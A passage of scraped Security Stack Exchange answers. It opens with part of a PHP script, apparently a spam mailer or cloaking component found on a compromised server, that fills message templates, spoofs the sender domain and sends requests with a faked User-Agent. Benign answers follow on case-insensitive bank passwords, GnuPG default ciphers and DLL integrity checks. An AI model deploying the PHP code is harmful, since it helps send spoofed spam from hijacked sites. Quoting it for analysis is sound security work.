$num = $matches[1][$i];
$min = pow(10, $num - 1);
$max = pow(10, $num) - 1;
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
function num_macros($content)
{
preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
function generate_word($length)
{
$chars = 'abcdefghijklmnopqrstuvyxz';
$numChars = strlen($chars);
$string = '';
for($i = 0; $i < $length; $i++)
{
$string .= substr($chars, rand(1, $numChars) - 1, 1);
}
return $string;
}
function pass_macros($content, $passes)
{
$pass = array_pop($passes);
return str_replace("[PASS]", $pass, $content);
}
function fteil_macros($content, $fteil)
{
return str_replace("[FTEIL]", $fteil, $content);
}
function is_ip($str) {
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
}
function from_host($content)
{
$host = preg_replace('/^(www|ftp)\./i','',@$_SERVER['HTTP_HOST']);
if (is_ip($host))
{
return $content;
}
$tokens = explode("@", $content);
$content = $tokens[0] . "@" . $host . ">";
return $content;
}
function error_404()
{
header("HTTP/1.1 404 Not Found");
$uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );
$content = custom_http_request1("http://".$_SERVER['HTTP_HOST']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
$content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );
exit( $content );
}
function custom_http_request1($params)
{
if( ! is_array($params) )
{
$params = array(
'url' => $params,
'method' => 'GET'
);
}
if( $params['url']=='' ) return FALSE;
if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
$params['method'] = strtoupper($params['method']);
if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE;
/* Приводим ссылку в правильный вид */
$url = parse_url($params['url']);
if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
if( ! isset($url['path']) ) $url['path'] = '/';
if( ! isset($url['host']) && isset($url['path']) )
{
if( strpos($url['path'], '/') )
{
$url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
$url['path'] = substr($url['path'], strpos($url['path'], '/'));
}
else
{
$url['host'] = $url['path'];
$url['path'] = '/';
}
}
$url['path'] = preg_replace("/[\\/]+/", "/", $url['path']);
if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";
$port = isset($params['port']) ? $params['port']
: ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );
$timeout = isset($params['timeout']) ? $params['timeout'] : 30;
if( ! isset($params['return']) ) $params['return'] = 'content';
$scheme = $url['scheme']=='https' ? 'ssl://':'';
$fp = @fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
if( $fp )
{
/* Mozilla */
if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";
$request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
$request .= "Host: {$url['host']}\r\n";
$request .= "User-Agent: {$params['User-Agent']}"."\r\n";
if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
if( isset($params['cookie']) )
{
$cookie = "";
if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
else $cookie = $params['cookie'];
if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
}
$request .= "Connection: close\r\n";
if( $params['method']=='POST' )
{
if( isset($params['data']) && is_array($params['data']) )
{
foreach($params['data'] AS $k => $v)
$data .= urlencode($k).'='.urlencode($v).'&';
if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
}
$data .= "\r\n\r\n";
$request .= "Content-type: application/x-www-form-urlencoded\r\n";
$request .= "Content-length: ".strlen($data)."\r\n";
}
$request .= "\r\n";
if( $params['method'] == 'POST' ) $request .= $data;
@fwrite ($fp,$request); /* Send request */
$res = ""; $headers = ""; $h_detected = false;
while( !@feof($fp) )
{
$res .= @fread($fp, 1024); /* читаем контент */
/* Проверка наличия загловков в контенте */
if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
{
/* заголовки уже считаны - корректируем контент */
$h_detected = true;
$headers = substr($res, 0, strpos($res, "\r\n\r\n"));
$res = substr($res, strpos($res, "\r\n\r\n")+4);
/* Headers to Array */
if( $params['return']=='headers' || $params['return']=='array'
|| (isset($params['redirect']) && $params['redirect']==true) )
{
$h = explode("\r\n", $headers);
$headers = array();
foreach( $h as $k=>$v )
{
if( strpos($v, ':') )
{
$k = substr($v, 0, strpos($v, ':'));
$v = trim(substr($v, strpos($v, ':')+1));
}
$headers[strtoupper($k)] = $v;
}
}
if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
{
$params['url'] = $headers['LOCATION'];
if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
if( $params['redirect-count']<10 )
{
$params['redirect-count']++;
$func = __FUNCTION__;
return @is_object($this) ? $this->$func($params) : $func($params);
}
}
if( $params['return']=='headers' ) return $headers;
}
}
@fclose($fp);
}
else return FALSE;/* $errstr.$errno; */
if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);
return $res;
} It's interesting to see some code comments in Russian. Google Translate does well for them: $res .= @fread($fp, 1024); /* читаем контент */ "read content" /* Проверка наличия загловков в контенте */ "Check availability of titles in the content" /* заголовки уже считаны - корректируем контент */ "headers already read - adjust content" | {
"source": [
"https://security.stackexchange.com/questions/86094",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/11825/"
]
} |
86,249 | It was recently brought to my attention that a certain big bank website allows users to log in with passwords that are not case sensitive. After confirming this, I checked other websites I bank with and found a second big bank website that does the same thing. I did not check their mobile clients. To me it seems like this lowers security, as this increases the number of unique passwords that can be used to log in to my account. Is there a common reason and/or justification for this from a security standpoint? The top non-security reason I could come up with is that it reduces calls to the helpdesk related to case sensitive passwords. | The most likely reason is that the backend only supports case-insensitive passwords. To quote OWASP : Occasionally, we find systems where passwords aren't case sensitive,
frequently due to legacy system issues like old mainframes that didn't
have case sensitive passwords. The chances of this happening are much higher with stodgy old institutions like big banks that are still running mainframes in the datacenter. | {
"source": [
"https://security.stackexchange.com/questions/86249",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/19699/"
]
} |
86,305 | I know, that one can force GnuPG to use AES256 for encryption with gpg --cipher-algo AES256 or with a special setting in ~/.gnu/gpg.conf . But, what is the default cypher algorithm for GnuPG, if I would miss this switch? | TL;DR: For GnuPG 1.0 and 2.0, default is Cast5, for GnuPG 2.1 it is AES-128. Recipient's Preferences Per default, GnuPG will read the recipient's algorithm preferences and take the first algorithm in that list it supports (in other words, it takes the most-preferred supported algorithm the recipient asks for). Safe Algorithms If no preferences are given (or --symmetric is used for symmetric encryption using a passphrase), it chooses a "safe" one. Safe means, one that must be or should be implemented. Which one this is depends on the version of GnuPG and compatibility level chosen. You can easily verify this by starting a symmetric encryption, passing one of the compatibility levels (or none, which implies --gnupg ): gpg --verbose --symmetric
gpg: using cipher CAST5 Strict RFC Compliance On the other hand, if enforcing strict OpenPGP compliance following RFC 4880 , it drops to triple DES: gpg --rfc4880 --verbose --symmetric
gpg: using cipher 3DES The same applies if enforcing RFC 2440 using --rfc2440 . GnuPG 2.1 Defaults to AES-128 GnuPG 2.0 also uses CAST5 with the default --gnupg , while this default was changed to AES-128 in GnuPG 2.1 : LANG=C gpg2 --verbose --symmetric
gpg: using cipher AES (AES without further specification means AES-128 in GnuPG) GnuPG 2.1 uses the same algorithms for the RFC-compliant settings. Digest Algorithms For digest algorithms, similar algorithm preference inference is performed. If --verbose is set as an option, the used algorithm is printed. An exception is the Modification Detection Code Packet , which only allows SHA-1 with no algorithm choice as defined by the standard. | {
"source": [
"https://security.stackexchange.com/questions/86305",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/72255/"
]
} |
86,492 | I have an old project in VB which created an unique pc code from MAC address and disc id. This was used to identify a pc so credentials cannot be used between pcs. This project migrated to C#, and I encapsulated this logic in a DLL which simply calls a method that returns the pc_id. The issue I have now is that it's damn easy to just create a new DLL which has the same class name and method signature and return whatever pc_id they wish. How can I ensure the DLL my program is referencing is actually mine? I thought of comparing the hash of my DLL with a hardcoded one, but is this safe between different OS? Will the hash of the file change between file systems? Or which method is preferred when ensuring files integrity/origin? | For Windows binaries, I would suggest to digitally sign the file. Where you use certificates, almost the same technology of HTTPS. Introduction to Code Signing SignTool Then you should use Windows cryptographic APIs to verify the signature of loaded DLLs. I know that to get this done, you need lot of work.
But, for Windows, this is the safest path . If SHA hashes are not enough, this is the alternative. | {
"source": [
"https://security.stackexchange.com/questions/86492",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/63627/"
]
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.